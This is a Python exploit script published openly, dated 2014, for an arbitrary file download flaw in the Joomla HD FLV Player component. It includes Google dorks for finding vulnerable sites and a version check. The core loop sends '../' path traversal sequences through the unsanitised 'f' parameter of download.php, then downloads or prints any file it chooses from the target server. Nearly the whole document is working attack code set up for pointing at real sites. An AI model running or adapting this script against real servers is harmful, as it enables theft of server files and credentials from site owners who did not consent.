#!/usr/bin/env python # # Exploit Title : Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability # # Exploit Author : Claudio Viviani # # Vendor Homepage : http://www.hdflvplayer.net/ # # Software Link : http://www.hdflvplayer.net/download_count.php?pid=5 # # Dork google 1: inurl:/component/hdflvplayer/ # Dork google 2: inurl:com_hdflvplayer # # Date : 2014-11-11 # # Tested on : BackBox 3.x/4.x # # Info: # Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f= # The variable "f" is not sanitized. # Over 80.000 downloads (statistic reported on official site) # # # Video Demo: http://youtu.be/QvBTKFLBQ20 # # # Http connection import urllib, urllib2 # String manipulation import re # Time management import time # Args management import optparse # Error management import sys banner = """ _______ __ ___ ___ ______ | _ .-----.-----.--------| .---.-. | Y | _ \\ |___| | _ | _ | | | _ | |. 1 |. | \\ |. | |_____|_____|__|__|__|__|___._| |. _ |. | \\ |: 1 | |: | |: 1 / |::.. . | |::.|:. |::.. . / `-------' `--- ---`------' _______ ___ ___ ___ _______ __ | _ | | | Y | | _ | .---.-.--.--.-----.----. |. 1___|. | |. | | |. 1 | | _ | | | -__| _| |. __) |. |___|. | | |. ____|__|___._|___ |_____|__| |: | |: 1 |: 1 | |: | |_____| |::.| |::.. . |\:.. ./ |::.| `---' `-------' `---' `---' <= 2.1.0.1 4rb1tr4ry F1l3 D0wnl04d Written by: Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww """ # Check url def checkurl(url): if url[:8] != "https://" and url[:7] != "http://": print('[X] You must insert http:// or https:// procotol') sys.exit(1) else: return url def checkcomponent(url,headers): try: req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php', None, headers) sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND") print("") except urllib2.HTTPError: sys.stdout.write("\r[+] Searching HD FLV Extension...: Not FOUND :(") sys.exit(1) except urllib2.URLError: print '[X] Connection Error' def checkversion(url,headers): try: req = urllib2.Request(url+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers) response = urllib2.urlopen(req).readlines() for line_version in response: if not line_version.find("<version>") == -1: VER = re.compile('>(.*?)<').search(line_version).group(1) sys.stdout.write("\r[+] Checking Version: "+str(VER)) print("") except urllib2.HTTPError: sys.stdout.write("\r[+] Checking Version: Unknown") except urllib2.URLError: print("\n[X] Connection Error") sys.exit(1) def connection(url,headers,pathtrav): char = "../" bar = "#" s = "" barcount = "" for a in range(1,20): s += char barcount += bar sys.stdout.write("\r[+] Exploiting...please wait: "+barcount) sys.stdout.flush() try: req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php?f='+s+pathtrav, None, headers) response = urllib2.urlopen(req) content = response.read() if content != "" and not "failed to open stream" in content: print("\n[!] VULNERABLE") print("[*] 3v1l Url: "+url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav) print("") print("[+] Do you want [D]ownload or [R]ead the file?") print("[+]") sys.stdout.write("\r[+] Please respond with 'D' or 'R': ") download = set(['d']) read = set(['r']) while True: choice = raw_input().lower() if choice in download: filedown = pathtrav.split('/')[-1] urllib.urlretrieve (url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav, filedown) print("[!] DOWNLOADED!") print("[!] Check file: "+filedown) return True elif choice in read: print("") print content return True else: sys.stdout.write("\r[X] Please respond with 'D' or 'R': ") except urllib2.HTTPError: #print '[X] HTTP Error' pass except urllib2.URLError: print '\n[X] Connection Error' time.sleep(1) print("\n[X] File not found or fixed component :(") commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME') commandList.add_option('-t', '--target', action="store", help="Insert TARGET URL: http[s]://www.victim.com[:PORT]", ) commandList.add_option('-f', '--file', action="store", help="Insert file to check", ) options, remainder = commandList.parse_args() # Check args if not options.target or not options.file: print(banner) commandList.print_help() sys.exit(1) print(banner) url = checkurl(options.target) pathtrav = options.file headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'} sys.stdout.write("\r[+] Searching HD FLV Extension...: ") checkcomponent(url,headers) sys.stdout.write("\r[+] Checking Version: ") checkversion(url,headers) sys.stdout.write("\r[+] Exploiting...please wait:") connection(url,headers,pathtrav)